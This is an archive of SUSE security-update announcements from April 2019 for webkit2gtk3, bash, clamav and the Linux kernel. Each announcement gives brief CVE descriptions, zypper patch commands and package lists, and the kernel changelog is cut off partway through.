xen-libs-32bit-4.11.1_04-2.6.1 xen-libs-4.11.1_04-2.6.1 xen-libs-debuginfo-32bit-4.11.1_04-2.6.1 xen-libs-debuginfo-4.11.1_04-2.6.1 References: https://www.suse.com/security/cve/CVE-2019-6778.html https://www.suse.com/security/cve/CVE-2019-9824.html https://bugzilla.suse.com/1026236 https://bugzilla.suse.com/1027519 https://bugzilla.suse.com/1069468 https://bugzilla.suse.com/1119161 https://bugzilla.suse.com/1120067 https://bugzilla.suse.com/1123157 https://bugzilla.suse.com/1126140 https://bugzilla.suse.com/1126141 https://bugzilla.suse.com/1126192 https://bugzilla.suse.com/1126195 https://bugzilla.suse.com/1126196 https://bugzilla.suse.com/1126197 https://bugzilla.suse.com/1126198 https://bugzilla.suse.com/1126201 https://bugzilla.suse.com/1126325 https://bugzilla.suse.com/1127400 https://bugzilla.suse.com/1127620 https://bugzilla.suse.com/1129623 From sle-security-updates at lists.suse.com Fri Apr 5 13:26:02 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Fri, 5 Apr 2019 21:26:02 +0200 (CEST) Subject: SUSE-SU-2019:0890-1: moderate: Security update for webkit2gtk3 Message-ID: <20190405192602.DD9F21012B@maintenance.suse.de> SUSE Security Update: Security update for webkit2gtk3 ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0890-1 Rating: moderate References: #1126768 Cross-References: CVE-2019-8375 Affected Products: SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 SUSE Linux Enterprise Module for Desktop Applications 15 SUSE Linux Enterprise Module for Basesystem 15 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for webkit2gtk3 to version 2.24.0 fixes the following issue: Security issue fixed: - CVE-2019-8375: Fixed an issue in UIProcess subsystem which could allow the script dialog size to exceed the web view size leading to Buffer Overflow or other unspecified impact (bsc#1126768). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-890=1 - SUSE Linux Enterprise Module for Desktop Applications 15: zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-2019-890=1 - SUSE Linux Enterprise Module for Basesystem 15: zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-890=1 Package List: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64): webkit-jsc-4-2.24.0-3.21.1 webkit-jsc-4-debuginfo-2.24.0-3.21.1 webkit2gtk3-debugsource-2.24.0-3.21.1 - SUSE Linux Enterprise Module for Desktop Applications 15 (aarch64 ppc64le s390x x86_64): typelib-1_0-JavaScriptCore-4_0-2.24.0-3.21.1 typelib-1_0-WebKit2-4_0-2.24.0-3.21.1 typelib-1_0-WebKit2WebExtension-4_0-2.24.0-3.21.1 webkit2gtk3-debugsource-2.24.0-3.21.1 webkit2gtk3-devel-2.24.0-3.21.1 - SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64): libjavascriptcoregtk-4_0-18-2.24.0-3.21.1 libjavascriptcoregtk-4_0-18-debuginfo-2.24.0-3.21.1 libwebkit2gtk-4_0-37-2.24.0-3.21.1 libwebkit2gtk-4_0-37-debuginfo-2.24.0-3.21.1 webkit2gtk-4_0-injected-bundles-2.24.0-3.21.1 webkit2gtk-4_0-injected-bundles-debuginfo-2.24.0-3.21.1 webkit2gtk3-debugsource-2.24.0-3.21.1 - SUSE Linux Enterprise Module for Basesystem 15 (noarch): libwebkit2gtk3-lang-2.24.0-3.21.1 References: https://www.suse.com/security/cve/CVE-2019-8375.html https://bugzilla.suse.com/1126768 From sle-security-updates at lists.suse.com Mon Apr 8 07:10:58 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Mon, 8 Apr 2019 15:10:58 +0200 (CEST) Subject: SUSE-SU-2019:0898-1: important: Security update for bash Message-ID: <20190408131058.EE131F7BB@maintenance.suse.de> SUSE Security Update: Security update for bash ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0898-1 Rating: important References: #1130324 Cross-References: CVE-2019-9924 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 SUSE Linux Enterprise Server 12-SP1-LTSS SUSE Linux Enterprise Server 12-LTSS ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for bash fixes the following issues: Security issue fixed: - CVE-2019-9924: Fixed a vulnerability in which shell did not prevent user BASH_CMDS allowing the user to execute any command with the permissions of the shell (bsc#1130324). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-898=1 - SUSE Linux Enterprise Server 12-SP1-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-898=1 - SUSE Linux Enterprise Server 12-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-2019-898=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (noarch): bash-doc-4.2-83.3.1 readline-doc-6.2-83.3.1 - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): bash-4.2-83.3.1 bash-debuginfo-4.2-83.3.1 bash-debugsource-4.2-83.3.1 libreadline6-32bit-6.2-83.3.1 libreadline6-6.2-83.3.1 libreadline6-debuginfo-32bit-6.2-83.3.1 libreadline6-debuginfo-6.2-83.3.1 - SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64): bash-4.2-83.3.1 bash-debuginfo-4.2-83.3.1 bash-debugsource-4.2-83.3.1 libreadline6-6.2-83.3.1 libreadline6-debuginfo-6.2-83.3.1 - SUSE Linux Enterprise Server 12-SP1-LTSS (s390x x86_64): libreadline6-32bit-6.2-83.3.1 libreadline6-debuginfo-32bit-6.2-83.3.1 - SUSE Linux Enterprise Server 12-SP1-LTSS (noarch): bash-doc-4.2-83.3.1 readline-doc-6.2-83.3.1 - SUSE Linux Enterprise Server 12-LTSS (ppc64le s390x x86_64): bash-4.2-83.3.1 bash-debuginfo-4.2-83.3.1 bash-debugsource-4.2-83.3.1 libreadline6-6.2-83.3.1 libreadline6-debuginfo-6.2-83.3.1 - SUSE Linux Enterprise Server 12-LTSS (s390x x86_64): libreadline6-32bit-6.2-83.3.1 libreadline6-debuginfo-32bit-6.2-83.3.1 - SUSE Linux Enterprise Server 12-LTSS (noarch): bash-doc-4.2-83.3.1 readline-doc-6.2-83.3.1 References: https://www.suse.com/security/cve/CVE-2019-9924.html https://bugzilla.suse.com/1130324 From sle-security-updates at lists.suse.com Mon Apr 8 07:11:41 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Mon, 8 Apr 2019 15:11:41 +0200 (CEST) Subject: SUSE-SU-2019:0897-1: important: Security update for clamav Message-ID: <20190408131141.91C9FF7BB@maintenance.suse.de> SUSE Security Update: Security update for clamav ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0897-1 Rating: important References: #1130721 Cross-References: CVE-2019-1787 CVE-2019-1788 CVE-2019-1789 Affected Products: SUSE OpenStack Cloud 7 SUSE Linux Enterprise Server for SAP 12-SP2 SUSE Linux Enterprise Server for SAP 12-SP1 SUSE Linux Enterprise Server 12-SP4 SUSE Linux Enterprise Server 12-SP3 SUSE Linux Enterprise Server 12-SP2-LTSS SUSE Linux Enterprise Server 12-SP2-BCL SUSE Linux Enterprise Server 12-SP1-LTSS SUSE Linux Enterprise Server 12-LTSS SUSE Linux Enterprise Desktop 12-SP4 SUSE Linux Enterprise Desktop 12-SP3 SUSE Enterprise Storage 4 ______________________________________________________________________________ An update that fixes three vulnerabilities is now available. Description: This update for clamav to version 0.100.3 fixes the following issues: Security issues fixed (bsc#1130721): - CVE-2019-1787: Fixed an out-of-bounds heap read condition which may occur when scanning PDF documents. - CVE-2019-1789: Fixed an out-of-bounds heap read condition which may occur when scanning PE files (i.e. Windows EXE and DLL files). - CVE-2019-1788: Fixed an out-of-bounds heap write condition which may occur when scanning OLE2 files such as Microsoft Office 97-2003 documents. Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE OpenStack Cloud 7: zypper in -t patch SUSE-OpenStack-Cloud-7-2019-897=1 - SUSE Linux Enterprise Server for SAP 12-SP2: zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-897=1 - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-897=1 - SUSE Linux Enterprise Server 12-SP4: zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-897=1 - SUSE Linux Enterprise Server 12-SP3: zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-897=1 - SUSE Linux Enterprise Server 12-SP2-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-897=1 - SUSE Linux Enterprise Server 12-SP2-BCL: zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-897=1 - SUSE Linux Enterprise Server 12-SP1-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-897=1 - SUSE Linux Enterprise Server 12-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-2019-897=1 - SUSE Linux Enterprise Desktop 12-SP4: zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-897=1 - SUSE Linux Enterprise Desktop 12-SP3: zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-897=1 - SUSE Enterprise Storage 4: zypper in -t patch SUSE-Storage-4-2019-897=1 Package List: - SUSE OpenStack Cloud 7 (s390x x86_64): clamav-0.100.3-33.21.1 clamav-debuginfo-0.100.3-33.21.1 clamav-debugsource-0.100.3-33.21.1 - SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64): clamav-0.100.3-33.21.1 clamav-debuginfo-0.100.3-33.21.1 clamav-debugsource-0.100.3-33.21.1 - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): clamav-0.100.3-33.21.1 clamav-debuginfo-0.100.3-33.21.1 clamav-debugsource-0.100.3-33.21.1 - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64): clamav-0.100.3-33.21.1 clamav-debuginfo-0.100.3-33.21.1 clamav-debugsource-0.100.3-33.21.1 - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64): clamav-0.100.3-33.21.1 clamav-debuginfo-0.100.3-33.21.1 clamav-debugsource-0.100.3-33.21.1 - SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le s390x x86_64): clamav-0.100.3-33.21.1 clamav-debuginfo-0.100.3-33.21.1 clamav-debugsource-0.100.3-33.21.1 - SUSE Linux Enterprise Server 12-SP2-BCL (x86_64): clamav-0.100.3-33.21.1 clamav-debuginfo-0.100.3-33.21.1 clamav-debugsource-0.100.3-33.21.1 - SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64): clamav-0.100.3-33.21.1 clamav-debuginfo-0.100.3-33.21.1 clamav-debugsource-0.100.3-33.21.1 - SUSE Linux Enterprise Server 12-LTSS (ppc64le s390x x86_64): clamav-0.100.3-33.21.1 clamav-debuginfo-0.100.3-33.21.1 clamav-debugsource-0.100.3-33.21.1 - SUSE Linux Enterprise Desktop 12-SP4 (x86_64): clamav-0.100.3-33.21.1 clamav-debuginfo-0.100.3-33.21.1 clamav-debugsource-0.100.3-33.21.1 - SUSE Linux Enterprise Desktop 12-SP3 (x86_64): clamav-0.100.3-33.21.1 clamav-debuginfo-0.100.3-33.21.1 clamav-debugsource-0.100.3-33.21.1 - SUSE Enterprise Storage 4 (x86_64): clamav-0.100.3-33.21.1 clamav-debuginfo-0.100.3-33.21.1 clamav-debugsource-0.100.3-33.21.1 References: https://www.suse.com/security/cve/CVE-2019-1787.html https://www.suse.com/security/cve/CVE-2019-1788.html https://www.suse.com/security/cve/CVE-2019-1789.html https://bugzilla.suse.com/1130721 From sle-security-updates at lists.suse.com Mon Apr 8 07:12:22 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Mon, 8 Apr 2019 15:12:22 +0200 (CEST) Subject: SUSE-SU-2019:0901-1: important: Security update for the Linux Kernel Message-ID: <20190408131222.383B0F7BB@maintenance.suse.de> SUSE Security Update: Security update for the Linux Kernel ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0901-1 Rating: important References: #1012382 #1020413 #1023175 #1031492 #1042286 #1050549 #1065600 #1070767 #1075697 #1078355 #1082943 #1086095 #1086652 #1087036 #1087092 #1090435 #1094823 #1099810 #1102875 #1102877 #1102879 #1102882 #1102896 #1102959 #1103429 #1105428 #1106061 #1106105 #1106929 #1107866 #1109137 #1109248 #1109695 #1114893 #1116345 #1116653 #1117108 #1117645 #1117744 #1119019 #1119680 #1119843 #1120017 #1120691 #1120722 #1120758 #1120902 #1121713 #1121726 #1121805 #1122650 #1122651 #1122779 #1122885 #1123321 #1123323 #1123357 #1123933 #1124166 #1124235 #1124728 #1124732 #1124735 #1124775 #1124777 #1124780 #1124811 #1125000 #1125014 #1125315 #1125446 #1125794 #1125796 #1125808 #1125809 #1125810 #1125892 #1126389 #1126772 #1126773 #1126805 #1127082 #1127155 #1127561 #1127725 #1127731 #1127961 #1128166 #1128452 #1128565 #1128696 #1128756 #1128893 #1129080 #1129179 #1129237 #1129238 #1129239 #1129240 #1129241 #1129413 #1129414 #1129415 #1129416 #1129417 #1129418 #1129419 #1129581 #1129770 #1129923 Cross-References: CVE-2017-18249 CVE-2019-2024 CVE-2019-3459 CVE-2019-3460 CVE-2019-6974 CVE-2019-7221 CVE-2019-7222 CVE-2019-9213 Affected Products: SUSE Linux Enterprise Server 12-SP3 ______________________________________________________________________________ An update that solves 8 vulnerabilities and has 102 fixes is now available. Description: The SUSE Linux Enterprise 12 SP3 Azure kernel was updated to 4.4.176 to receive various security and bugfixes. The following security bugs were fixed: - CVE-2019-2024: A use-after-free when disconnecting a source was fixed which could lead to crashes. bnc#1129179). - CVE-2019-9213: expand_downwards in mm/mmap.c lacked a check for the mmap minimum address, which made it easier for attackers to exploit kernel NULL pointer dereferences on non-SMAP platforms. This is related to a capability check for the wrong task (bnc#1128166). - CVE-2019-6974: kvm_ioctl_create_device in virt/kvm/kvm_main.c mishandled reference counting because of a race condition, leading to a use-after-free. (bnc#1124728) - CVE-2019-3459, CVE-2019-3460: The Bluetooth stack suffered from two remote information leak vulnerabilities in the code that handles incoming L2cap configuration packets (bsc#1120758). - CVE-2019-7221: Fixed a use-after-free vulnerability in the KVM hypervisor related to the emulation of a preemption timer, allowing an guest user/process to crash the host kernel. (bsc#1124732). - CVE-2019-7222: Fixed an information leakage in the KVM hypervisor related to handling page fault exceptions, which allowed a guest user/process to use this flaw to leak the host's stack memory contents to a guest (bsc#1124735). - CVE-2017-18249: The add_free_nid function in fs/f2fs/node.c did not properly track an allocated nid, which allowed local users to cause a denial of service (race condition) or possibly have unspecified other impact via concurrent threads (bnc#1087036). The following non-security bugs were fixed: - acpi/nfit: Block function zero DSMs (bsc#1123321). - acpi, nfit: Fix ARS overflow continuation (bsc#1125000). - acpi/nfit: fix cmd_rc for acpi_nfit_ctl to always return a value (bsc#1124775). - acpi/nfit: Fix command-supported detection (bsc#1123323). - acpi: power: Skip duplicate power resource references in _PRx (bnc#1012382). - acpi / processor: Fix the return value of acpi_processor_ids_walk() (git fixes (acpi)). - alpha: Fix Eiger NR_IRQS to 128 (bnc#1012382). - alpha: fix page fault handling for r16-r18 targets (bnc#1012382). - alsa: bebob: fix model-id of unit for Apogee Ensemble (bnc#1012382). - alsa: compress: Fix stop handling on compressed capture streams (bnc#1012382). - alsa: hda - Add quirk for HP EliteBook 840 G5 (bnc#1012382). - alsa: hda/realtek - Disable headset Mic VREF for headset mode of ALC225 (bnc#1012382). - alsa: hda - Serialize codec registrations (bnc#1012382). - alsa: usb-audio: Fix implicit fb endpoint setup by quirk (bnc#1012382). - ARC: perf: map generic branches to correct hardware condition (bnc#1012382). - arm64: Do not trap host pointer auth use to EL2 (bnc#1012382). - arm64: ftrace: do not adjust the LR value (bnc#1012382). - arm64: hyp-stub: Forbid kprobing of the hyp-stub (bnc#1012382). - arm64/kvm: consistently handle host HCR_EL2 flags (bnc#1012382). - arm64: KVM: Skip MMIO insn after emulation (bnc#1012382). - arm64: perf: set suppress_bind_attrs flag to true (bnc#1012382). - ARM: 8808/1: kexec:offline panic_smp_self_stop CPU (bnc#1012382). - ARM: cns3xxx: Fix writing to wrong PCI config registers after alignment (bnc#1012382). - ARM: dts: da850-evm: Correct the sound card name (bnc#1012382). - ARM: dts: Fix OMAP4430 SDP Ethernet startup (bnc#1012382). - ARM: dts: kirkwood: Fix polarity of GPIO fan lines (bnc#1012382). - ARM: dts: mmp2: fix TWSI2 (bnc#1012382). - ARM: iop32x/n2100: fix PCI IRQ mapping (bnc#1012382). - ARM: OMAP2+: hwmod: Fix some section annotations (bnc#1012382). - ARM: pxa: avoid section mismatch warning (bnc#1012382). - ASoC: atom: fix a missing check of snd_pcm_lib_malloc_pages (bnc#1012382). - ASoC: fsl: Fix SND_SOC_EUKREA_TLV320 build error on i.MX8M (bnc#1012382). - ASoC: Intel: mrfld: fix uninitialized variable access (bnc#1012382). - ata: Fix racy link clearance (bsc#1107866). - ax25: fix possible use-after-free (bnc#1012382). - batman-adv: Avoid WARN on net_device without parent in netns (bnc#1012382). - batman-adv: Force mac header to start of data on xmit (bnc#1012382). - block_dev: fix crash on chained bios with O_DIRECT (bsc#1090435). - block: do not use bio->bi_vcnt to figure out segment number (bsc#1128893). - block/loop: Use global lock for ioctl() operation (bnc#1012382). - block/swim3: Fix -EBUSY error when re-opening device after unmount (Git-fixes). - bluetooth: Fix unnecessary error message for HCI request completion (bnc#1012382). - bnxt_re: Fix couple of memory leaks that could lead to IOMMU call traces (bsc#1020413). - bnxt_re: Fix couple of memory leaks that could lead to IOMMU call traces (bsc#1020413). - bpf: fix replace_map_fd_with_map_ptr's ldimm64 second imm field (bsc#1012382). - btrfs: ensure that a DUP or RAID1 block group has exactly two stripes (bsc#1128452). - btrfs: tree-checker: Check level for leaves and nodes (bnc#1012382). - btrfs: tree-checker: Do not check max block group size as current max chunk size limit is unreliable (fixes for bnc#1012382 bsc#1102875 bsc#1102877 bsc#1102879 bsc#1102882 bsc#1102896). - btrfs: tree-checker: Fix misleading group system information (bnc#1012382). - btrfs: tree-check: reduce stack consumption in check_dir_item (bnc#1012382). - btrfs: validate type when reading a chunk (bnc#1012382). - btrfs: wait on ordered extents on abort cleanup (bnc#1012382). - can: bcm: check timer values before ktime conversion (bnc#1012382). - can: dev: __can_get_echo_skb(): fix bogous check for non-existing skb by removing it (bnc#1012382). - can: gw: ensure DLC boundaries after CAN frame modification (bnc#1012382). - ceph: avoid repeatedly adding inode to mdsc->snap_flush_list (bsc#1126773). - ceph: clear inode pointer when snap realm gets dropped by its inode (bsc#1125809). - ch: add missing mutex_lock()/mutex_unlock() in ch_release() (bsc#1124235). - char/mwave: fix potential Spectre v1 vulnerability (bnc#1012382). - ch: fixup refcounting imbalance for SCSI devices (bsc#1124235). - cifs: Always resolve hostname before reconnecting (bnc#1012382). - cifs: check ntwrk_buf_start for NULL before dereferencing it (bnc#1012382). - cifs: Do not count -ENODATA as failure for query directory (bnc#1012382). - cifs: Do not hide EINTR after sending network packets (bnc#1012382). - cifs: Fix possible hang during async MTU reads and writes (bnc#1012382). - cifs: Fix potential OOB access of lock element array (bnc#1012382). - cifs: Limit memory used by lock request calls to a page (bnc#1012382). - clk: imx6q: reset exclusive gates on init (bnc#1012382). - clk: imx6sl: ensure MMDC CH0 handshake is bypassed (bnc#1012382). - copy_mount_string: Limit string length to PATH_MAX (bsc#1082943). - cpufreq: intel_pstate: Fix HWP on boot CPU after system resume (bsc#1120017). - cpuidle: big.LITTLE: fix refcount leak (bnc#1012382). - crypto: authencesn - Avoid twice completion call in decrypt path (bnc#1012382). - crypto: authenc - fix parsing key with misaligned rta_len (bnc#1012382). - crypto: cts - fix crash on short inputs (bnc#1012382). - crypto: user - support incremental algorithm dumps (bsc#1120902). - crypto: ux500 - Use proper enum in cryp_set_dma_transfer (bnc#1012382). - crypto: ux500 - Use proper enum in hash_set_dma_transfer (bnc#1012382). - cw1200: Fix concurrency use-after-free bugs in cw1200_hw_scan() (bnc#1012382). - dccp: fool proof ccid_hc_[rt]x_parse_options() (bnc#1012382). - debugfs: fix debugfs_rename parameter checking (bnc#1012382). - device property: Fix the length used in PROPERTY_ENTRY_STRING() (bsc#1129770). - Disable MSI also when pcie-octeon.pcie_disable on (bnc#1012382). - dlm: Do not swamp the CPU with callbacks queued during recovery (bnc#1012382). - dmaengine: imx-dma: fix wrong callback invoke (bnc#1012382). - dm crypt: add cryptographic data integrity protection (authenticated encryption) (Git-fixes). - dm crypt: factor IV constructor out to separate function (Git-fixes). - dm crypt: fix crash by adding missing check for auth key size (git-fixes). - dm crypt: fix error return code in crypt_ctr() (git-fixes). - dm crypt: fix memory leak in crypt_ctr_cipher_old() (git-fixes). - dm crypt: introduce new format of cipher with "capi:" prefix (Git-fixes). - dm crypt: wipe kernel key copy after IV initialization (Git-fixes). - dm: do not allow readahead to limit IO size (git fixes (readahead)). - dm kcopyd: Fix bug causing workqueue stalls (bnc#1012382). - dm snapshot: Fix excessive memory usage and workqueue stalls (bnc#1012382). - dm thin: fix bug where bio that overwrites thin block ignores FUA (bnc#1012382). - Documentation/network: reword kernel version reference (bnc#1012382). - drbd: Avoid Clang warning about pointless switch statment (bnc#1012382). - drbd: disconnect, if the wrong UUIDs are attached on a connected peer (bnc#1012382). - drbd: narrow rcu_read_lock in drbd_sync_handshake (bnc#1012382). - drbd: skip spurious timeout (ping-timeo) when failing promote (bnc#1012382). - drivers: core: Remove glue dirs from sysfs earlier (bnc#1012382). - Drivers: hv: vmbus: Check for ring when getting debug info (bsc#1126389). - drm/bufs: Fix Spectre v1 vulnerability (bnc#1012382). - drm: Fix error handling in drm_legacy_addctx (bsc#1106929) - drm/i915: Block fbdev HPD processing during suspend (bsc#1106929) - drm/i915: Prevent a race during I915_GEM_MMAP ioctl with WC set (bsc#1106929) - drm/modes: Prevent division by zero htotal (bnc#1012382). - drm/nouveau/bios/ramcfg: fix missing parentheses when calculating RON (bsc#1106929) - drm/nouveau/pmu: do not print reply values if exec is false (bsc#1106929) - drm/radeon/evergreen_cs: fix missing break in switch statement (bsc#1106929) - drm/vmwgfx: Do not double-free the mode stored in par->set_mode (bsc#1103429) - drm/vmwgfx: Fix setting of dma masks (bsc#1106929) - drm/vmwgfx: Return error code from vmw_execbuf_copy_fence_user (bsc#1106929) - e1000e: allow non-monotonic SYSTIM readings (bnc#1012382). - EDAC: Raise the maximum number of memory controllers (bsc#1120722). - efi/libstub/arm64: Use hidden attribute for struct screen_info reference (bsc#1122650). - enic: add wq clean up budget (bsc#1075697, bsc#1120691. bsc#1102959). - enic: do not overwrite error code (bnc#1012382). - enic: fix checksum validation for IPv6 (bnc#1012382). - exec: load_script: do not blindly truncate shebang string (bnc#1012382). - ext4: fix a potential fiemap/page fault deadlock w/ inline_data (bnc#1012382). - ext4: Fix crash during online resizing (bsc#1122779). - f2fs: Add sanity_check_inode() function (bnc#1012382). - f2fs: avoid unneeded loop in build_sit_entries (bnc#1012382). - f2fs: check blkaddr more accuratly before issue a bio (bnc#1012382). - f2fs: clean up argument of recover_data (bnc#1012382). - f2fs: clean up with is_valid_blkaddr() (bnc#1012382). - f2fs: detect wrong layout (bnc#1012382). - f2fs: enhance sanity_check_raw_super() to avoid potential overflow (bnc#1012382). - f2fs: factor out fsync inode entry operations (bnc#1012382). - f2fs: fix inode cache leak (bnc#1012382). - f2fs: fix invalid memory access (bnc#1012382). - f2fs: fix missing up_read (bnc#1012382). - f2fs: fix to avoid reading out encrypted data in page cache (bnc#1012382). - f2fs: fix to convert inline directory correctly (bnc#1012382). - f2fs: fix to determine start_cp_addr by sbi->cur_cp_pack (bnc#1012382). - f2fs: fix to do sanity check with block address in main area (bnc#1012382). - f2fs: fix to do sanity check with block address in main area v2 (bnc#1012382). - f2fs: fix to do sanity check with cp_pack_start_sum (bnc#1012382). - f2fs: fix to do sanity check with node footer and iblocks (bnc#1012382). - f2fs: fix to do sanity check with reserved blkaddr of inline inode (bnc#1012382). - f2fs: fix to do sanity check with secs_per_zone (bnc#1012382). - f2fs: fix to do sanity check with user_block_count (bnc#1012382). - f2fs: fix validation of the block count in sanity_check_raw_super (bnc#1012382). - f2fs: fix wrong return value of f2fs_acl_create (bnc#1012382). - f2fs: free meta pages if sanity check for ckpt is failed (bnc#1012382). - f2fs: give -EINVAL for norecovery and rw mount (bnc#1012382). - f2fs: introduce and spread verify_blkaddr (bnc#1012382). - f2fs: introduce get_checkpoint_version for cleanup (bnc#1012382). - f2fs: move dir data flush to write checkpoint process (bnc#1012382). - f2fs: move sanity checking of cp into get_valid_checkpoint (bnc#1012382). - f2fs: not allow to write illegal blkaddr (bnc#1012382). - f2fs: put directory inodes before checkpoint in roll-forward recovery (bnc#1012382). - f2fs: read page index before freeing (bnc#1012382). - f2fs: remove an obsolete variable (bnc#1012382). - f2fs: return error during fill_super (bnc#1012382). - f2fs: sanity check on sit entry (bnc#1012382). - f2fs: use crc and cp version to determine roll-forward recovery (bnc#1012382). - fbdev: chipsfb: remove set but not used variable 'size' (bsc#1106929) - Fix incorrect value for X86_FEATURE_TSX_FORCE_ABORT - Fix problem with sharetransport= and NFSv4 (bsc#1114893). - fs: add the fsnotify call to vfs_iter_write (bnc#1012382). - fs/dcache: Fix incorrect nr_dentry_unused accounting in shrink_dcache_sb() (bnc#1012382). - fs: do not scan the inode cache before SB_BORN is set (bnc#1012382). - fs/epoll: drop ovflist branch prediction (bnc#1012382). - fs: fix lost error code in dio_complete (bsc#1117744). - fuse: call pipe_buf_release() under pipe lock (bnc#1012382). - fuse: decrement NR_WRITEBACK_TEMP on the right page (bnc#1012382). - fuse: handle zero sized retrieve correctly (bnc#1012382). - futex: Fix (possible) missed wakeup (bsc#1050549). - gdrom: fix a memory leak bug (bnc#1012382). - gfs2: Revert "Fix loop in gfs2_rbm_find" (bnc#1012382). - gpiolib: Fix return value of gpio_to_desc() stub if !GPIOLIB (Git-fixes). - gpio: pl061: handle failed allocations (bnc#1012382). - gpu: ipu-v3: Fix CSI offsets for imx53 (bsc#1106929) - gpu: ipu-v3: Fix i.MX51 CSI control registers offset (bsc#1106929) - HID: debug: fix the ring buffer implementation (bnc#1012382). - HID: lenovo: Add checks to fix of_led_classdev_register (bnc#1012382). - hwmon: (lm80) fix a missing check of bus read in lm80 probe (bnc#1012382). - hwmon: (lm80) fix a missing check of the status of SMBus read (bnc#1012382). - hwmon: (lm80) Fix missing unlock on error in set_fan_div() (git-fixes). - i2c-axxia: check for error conditions first (bnc#1012382). - i2c: dev: prevent adapter retries and timeout being set as minus value (bnc#1012382). - IB/core: type promotion bug in rdma_rw_init_one_mr() (). - ibmveth: Do not process frames after calling napi_reschedule (bcs#1123357). - ibmvnic: Add ethtool private flag for driver-defined queue limits (bsc#1121726). - ibmvnic: Increase maximum queue size limit (bsc#1121726). - ibmvnic: Introduce driver limits for ring sizes (bsc#1121726). - ibmvnic: Report actual backing device speed and duplex values (bsc#1129923). - ibmvscsi: Fix empty event pool access during host removal (bsc#1119019). - IB/rxe: Fix incorrect cache cleanup in error flow (). - IB/rxe: replace kvfree with vfree (). - igb: Fix an issue that PME is not enabled during runtime suspend (bnc#1012382). - inet: frags: add a pointer to struct netns_frags (bnc#1012382). - inet: frags: better deal with smp races (bnc#1012382). - inet: frags: break the 2GB limit for frags storage (bnc#1012382). - inet: frags: change inet_frags_init_net() return value (bnc#1012382). - inet: frags: do not clone skb in ip_expire() (bnc#1012382). - inet: frags: fix ip6frag_low_thresh boundary (bnc#1012382). - inet: frags: get rid of ipfrag_skb_cb/FRAG_CB (bnc#1012382). - inet: frags: get rif of inet_frag_evicting() (bnc#1012382). - inet: frags: refactor ipfrag_init() (bnc#1012382). - inet: frags: refactor ipv6_frag_init() (bnc#1012382). - inet: frags: refactor lowpan_net_frag_init() (bnc#1012382). - inet: frags: remove inet_frag_maybe_warn_overflow() (bnc#1012382). - inet: frags: remove some helpers (bnc#1012382). - inet: frags: reorganize struct netns_frags (bnc#1012382). - inet: frags: use rhashtables for reassembly units (bnc#1012382). - input: bma150 - register input device after setting private data (bnc#1012382). - input: elan_i2c - add ACPI ID for touchpad in Lenovo V330-15ISK (bnc#1012382). - input: elantech - enable 3rd button support on Fujitsu CELSIUS H780 (bnc#1012382). - input: mms114 - fix license module information (bsc#1087092). - input: xpad - add support for SteelSeries Stratus Duo (bnc#1012382). - intel_pstate: Update frequencies of policy->cpus only from ->set_policy() (bsc#1120017). - iommu/amd: Call free_iova_fast with pfn in map_sg (bsc#1106105). - iommu/amd: Fix IOMMU page flush when detach device from a domain (bsc#1106105). - iommu/amd: Unmap all mapped pages in error path of map_sg (bsc#1106105). - iommu/arm-smmu-v3: Use explicit mb() when moving cons pointer (bnc#1012382). - iommu/dmar: Fix buffer overflow during PCI bus notification (bsc#1129237). - iommu/io-pgtable-arm-v7s: Only kmemleak_ignore L2 tables (bsc#1129238). - iommu/vt-d: Check identity map for hot-added devices (bsc#1129239). - iommu/vt-d: Fix memory leak in intel_iommu_put_resv_regions() (bsc#1106105). - iommu/vt-d: Fix NULL pointer reference in intel_svm_bind_mm() (bsc#1129240). - ip: add helpers to process in-order fragments faster (bnc#1012382). - ipfrag: really prevent allocation on netns exit (bnc#1012382). - ip: frags: fix crash in ip_do_fragment() 